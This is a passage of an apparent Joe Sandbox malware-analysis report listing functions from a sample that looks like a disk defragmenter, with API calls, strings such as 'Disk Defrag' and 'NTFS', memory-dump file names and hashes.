                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$GdiplusShutdown
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3506214061-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7eae0b955cfe46139e040fd821d45967254a2c9d3517b53231cd44731b97ba61
                                                                                                                                                                                                                                                                                    • Instruction ID: 085117cba8507ed758f2e3bd9e34728127d7a1f2de7180c4966a7f221b9c7101
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eae0b955cfe46139e040fd821d45967254a2c9d3517b53231cd44731b97ba61
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16E0863166C2145ACA007BB6BC49B663F64AFC0B1471941BFE008B31E0C57855448FFD
                                                                                                                                                                                                                                                                                    Function 00404840 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentObject.GDI32(?,00000006), ref: 0040496A
                                                                                                                                                                                                                                                                                    • GetCurrentObject.GDI32(?,00000006), ref: 0040497C
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 0040498F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Object$Current
                                                                                                                                                                                                                                                                                    • String ID: Pm)u
                                                                                                                                                                                                                                                                                    • API String ID: 794720297-3463418517
                                                                                                                                                                                                                                                                                    • Opcode ID: 1c15ff392ba4ccc552d1cc8ccfec82d3bdfd914156950518807fb3f3c9dd7546
                                                                                                                                                                                                                                                                                    • Instruction ID: 20de2fea0a77186f2b8b7da5da4347ef9f16a332326cf680508f5ccd498c1f2d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c15ff392ba4ccc552d1cc8ccfec82d3bdfd914156950518807fb3f3c9dd7546
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2B12AB16083019FC714DF28C984A6BB7E5BBC8710F148A2EF69997395D734E805CB9A
                                                                                                                                                                                                                                                                                    Function 00467820 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 004679CE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004679E4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DeleteObject
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 4188969710-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: bb304f05f30cbdd69a183ac06b326108be92b73323326cf8809e001b9e6bd276
                                                                                                                                                                                                                                                                                    • Instruction ID: 57d6ba00d9628d7bc6127d5ab1f70525051783d1f21ea283ef51d44a992bc025
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb304f05f30cbdd69a183ac06b326108be92b73323326cf8809e001b9e6bd276
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92612C70A08316DFD714EF64C884A1AB7A5BF84318F1088AEE955A7351E734EC45CFAB
                                                                                                                                                                                                                                                                                    Function 0040C4D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: Back$GUBar::CDrawObjectFactory::CreateRectTextDraw$Text
                                                                                                                                                                                                                                                                                    • API String ID: 0-2901586747
                                                                                                                                                                                                                                                                                    • Opcode ID: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                    • Instruction ID: 94c29d93b79a1152409cb834b352fc504edd985983e521adcc95b20eb26bf893
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6514F75604315EFC710DF25C880A6BB7E8EB88754F104A2EF84997380E779ED458B9A
                                                                                                                                                                                                                                                                                    Function 00402A30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,75BFAF60), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000200), ref: 00402ADD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00402AF7
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA20: SHGetFileInfoW.SHELL32(?,00000000,000002B4,000002B4,00004001), ref: 0041AA4D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001214,00000004,00000000), ref: 00402B9F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileInfoMessageSend$DriveDrivesLogicalType
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 2359154852-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: 3170ff8149e9c2b6ee3bcf2834819091aa34d1669217c11efa96fe0deec9a490
                                                                                                                                                                                                                                                                                    • Instruction ID: 82d795afe4258906e57f36ef34ec2eb48dfa52df3f098ca2abc9abbdf1da0df4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3170ff8149e9c2b6ee3bcf2834819091aa34d1669217c11efa96fe0deec9a490
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D541D6717443406BE324DF61DC86FAA73A4AB84B04F00492DF249AB2C1DBB4A545CB9A
                                                                                                                                                                                                                                                                                    Function 00461900 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004619BD
                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,Disk Defrag,00040010), ref: 004619FE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLastMessage
                                                                                                                                                                                                                                                                                    • String ID: %c:\$Disk Defrag
                                                                                                                                                                                                                                                                                    • API String ID: 463093485-3222931339
                                                                                                                                                                                                                                                                                    • Opcode ID: 518deffa12bdbb6d37a9a145068253991ac5e7d9b5727993573dfc0c972e2c19
                                                                                                                                                                                                                                                                                    • Instruction ID: 731faf273718486ffcde032920aca0e1f319cedce5eb76f7311323341e126d0a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 518deffa12bdbb6d37a9a145068253991ac5e7d9b5727993573dfc0c972e2c19
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E64195712087419FC324DF25D845B6BB7E4EF84715F044A2EF599C7290EB74A808CB9B
                                                                                                                                                                                                                                                                                    Function 00410B80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,?), ref: 00410C49
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%HOMEDRIVE%,?,0000000C), ref: 00410C8F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandInformationStringsVolume
                                                                                                                                                                                                                                                                                    • String ID: %HOMEDRIVE%$NTFS
                                                                                                                                                                                                                                                                                    • API String ID: 1751349637-3402063299
                                                                                                                                                                                                                                                                                    • Opcode ID: 074aaa8893bb910327e97c9f9852001168cb7cda255d028d6430084e15aab4d5
                                                                                                                                                                                                                                                                                    • Instruction ID: 637acb8aad6857eaaece39300668810a01c8d3601b07b0b48692e68ec32a0e85
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 074aaa8893bb910327e97c9f9852001168cb7cda255d028d6430084e15aab4d5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 224160706083019BD714DF75CA86BAB77E4AF88704F40493EB949C7291EBB8D984CB5A
                                                                                                                                                                                                                                                                                    Function 004629B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,0000000C,0000000C,?,?,?,?,?,?,?,004619AE), ref: 004629EC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InformationVolume
                                                                                                                                                                                                                                                                                    • String ID: FAT$FAT16$FAT32
                                                                                                                                                                                                                                                                                    • API String ID: 2039140958-3969911809
                                                                                                                                                                                                                                                                                    • Opcode ID: 254a78ae61a87bb598648bcb239176478e62f78007c312b98b488536b990b747
                                                                                                                                                                                                                                                                                    • Instruction ID: 45468f2d8361374e2203d088d382e4daaec04f6418c830f46f854969d88bf3c3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 254a78ae61a87bb598648bcb239176478e62f78007c312b98b488536b990b747
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16112175A18300AED754EF789D92B6B77E4AF88704F84492EF848C3251F678D604CB9B
                                                                                                                                                                                                                                                                                    Function 004226A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,00000000), ref: 004226F8
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 0042271F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
